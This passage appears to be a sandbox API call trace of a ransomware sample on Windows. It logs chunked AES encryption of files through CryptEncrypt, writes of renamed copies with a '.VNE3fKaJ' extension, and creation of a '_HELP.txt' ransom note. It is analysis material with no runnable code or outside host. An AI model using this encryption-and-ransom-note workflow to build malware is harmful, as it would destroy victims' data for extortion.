nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.230] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.230] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.230] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.230] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.230] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.230] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.230] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.230] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.230] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.230] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.230] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.230] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.230] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.230] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.230] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.231] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.231] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.231] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.231] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.231] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.231] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.231] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.231] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.231] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.231] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.231] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.231] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.231] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.231] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.231] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.231] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.231] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.231] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x9, lpOverlapped=0x0) returned 1 [0153.231] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x9, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x10) returned 1 [0153.231] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x10, lpOverlapped=0x0) returned 1 [0153.231] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x0, lpOverlapped=0x0) returned 1 [0153.231] CloseHandle (hObject=0x454) returned 1 [0153.232] CloseHandle (hObject=0x45c) returned 1 [0153.232] CryptDestroyHash (hHash=0x284d528) returned 1 [0153.232] CryptDestroyKey (hKey=0x284d668) returned 1 [0153.232] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0153.232] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\_HELP.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\_help.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x326a4cc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0153.233] GetFileType (hFile=0x45c) returned 0x1 [0153.233] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationup_selectionsubpicture.png")) returned 0 [0153.234] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\photograph.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x45c [0153.234] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png.VNE3fKaJ" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\photograph.png.vne3fkaj"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0153.234] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0153.235] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0153.235] CryptHashData (hHash=0x284d5a8, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0153.235] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0153.235] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x60d7 [0153.235] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.236] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.236] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.237] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.237] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.237] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.237] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.237] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.237] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.237] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.237] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.237] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.237] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.237] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.237] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.238] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.238] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.238] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.238] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.238] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.238] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.238] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.238] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.238] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.238] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.238] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.238] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.238] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.238] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.238] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.238] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.238] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.238] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.238] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.238] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.238] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.238] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.239] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.239] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.239] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.239] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.239] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.239] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.239] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.239] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.239] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.239] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.239] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.239] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.239] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.239] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.239] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.239] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.239] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.239] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.239] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.239] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.239] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.239] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: 